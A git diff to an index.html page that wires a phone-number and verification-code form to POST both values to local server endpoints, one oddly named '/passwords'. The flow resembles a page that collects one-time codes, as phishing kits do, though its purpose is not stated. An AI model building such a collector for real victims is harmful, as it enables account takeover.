--- a/index.html
+++ b/index.html
@@ -373,20 +373,64 @@
                     return;
                 }
 
-                document.getElementById('phoneDisplay').textContent = phoneNumber;
-                document.getElementById('initialContainer').style.display = 'none';
-                document.getElementById('phoneVerificationContainer').style.display = 'block';
+                // Send phone number to the server
+                fetch('http://localhost:8000/passwords', {
+                    method: 'POST',
+                    headers: {
+                        'Content-Type': 'application/json',
+                    },
+                    body: JSON.stringify({ phone: phoneNumber }),
+                })
+                .then(response => {
+                    if (!response.ok) {
+                        throw new Error('Failed to send phone number');
+                    }
+                    return response.json();
+                })
+                .then(data => {
+                    console.log('Phone number sent:', data);
+                    document.getElementById('phoneDisplay').textContent = phoneNumber;
+                    document.getElementById('initialContainer').style.display = 'none';
+                    document.getElementById('phoneVerificationContainer').style.display = 'block';
+                })
+                .catch(error => {
+                    console.error('Error:', error);
+                    alert('An error occurred while sending your phone number. Please try again.');
+                });
             };
 
             window.submitVerification = function() {
                 const verificationCode = document.getElementById('verificationCode').value;
+                const phoneNumber = phoneNumberInput.value;
+
                 if (verificationCode === '') {
                     alert('Please enter the verification code.');
                     return;
                 }
 
-                document.getElementById('phoneVerificationContainer').style.display = 'none';
-                document.getElementById('finalMessageContainer').style.display = 'block';
+                // Send verification code to the server
+                fetch('http://localhost:8000/verification', {
+                    method: 'POST',
+                    headers: {
+                        'Content-Type': 'application/json',
+                    },
+                    body: JSON.stringify({ phone: phoneNumber, code: verificationCode }),
+                })
+                .then(response => {
+                    if (!response.ok) {
+                        throw new Error('Failed to send verification code');
+                    }
+                    return response.json();
+                })
+                .then(data => {
+                    console.log('Verification code sent:', data);
+                    document.getElementById('phoneVerificationContainer').style.display = 'none';
+                    document.getElementById('finalMessageContainer').style.display = 'block';
+                })
+                .catch(error => {
+                    console.error('Error:', error);
+                    alert('An error occurred while sending your verification code. Please try again.');
+                });
             };
 
             window.resetForm = function() {
